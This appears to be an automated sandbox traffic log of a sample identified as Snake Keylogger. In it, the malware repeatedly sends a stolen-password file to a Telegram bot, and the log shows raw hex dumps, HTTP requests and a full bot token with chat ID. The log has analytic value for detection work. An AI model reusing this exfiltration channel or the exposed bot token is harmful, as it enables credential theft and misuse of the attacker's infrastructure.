                                                                    2022-06-26 07:32:41 UTC11INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66752,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228760,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    60192.168.2.549863149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:04 UTC101OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e3a9ffd1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:04 UTC101OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 33 61 39 66 66 64 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e3a9ffd1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:04 UTC102INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:04 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:04 UTC102INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66811,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228784,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    61192.168.2.549865149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:04 UTC103OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e3e7fb9c
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:04 UTC103OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 33 65 37 66 62 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e3e7fb9cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:05 UTC103INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:05 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:05 UTC104INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66813,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228784,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    62192.168.2.549868149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:05 UTC104OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e43b6d80
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:05 UTC105OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 34 33 62 36 64 38 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e43b6d80Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:05 UTC105INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:05 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:05 UTC105INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66814,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228785,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    63192.168.2.549871149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:05 UTC106OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e4724548
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:05 UTC106OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 34 37 32 34 35 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e4724548Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:05 UTC107INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:05 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:05 UTC107INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66815,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228785,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    64192.168.2.549874149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:05 UTC108OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e4adde3e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:05 UTC108OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 34 61 64 64 65 33 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e4adde3eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:06 UTC108INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:06 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:06 UTC109INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66816,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228786,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    65192.168.2.549876149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:06 UTC109OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e4ebdb2f
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:06 UTC110OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 34 65 62 64 62 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e4ebdb2fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:06 UTC110INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:06 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:06 UTC110INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66818,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228786,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    66192.168.2.549879149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:06 UTC111OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756e52776dd
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:06 UTC111OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 35 32 37 37 36 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756e52776ddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:07 UTC112INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:07 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
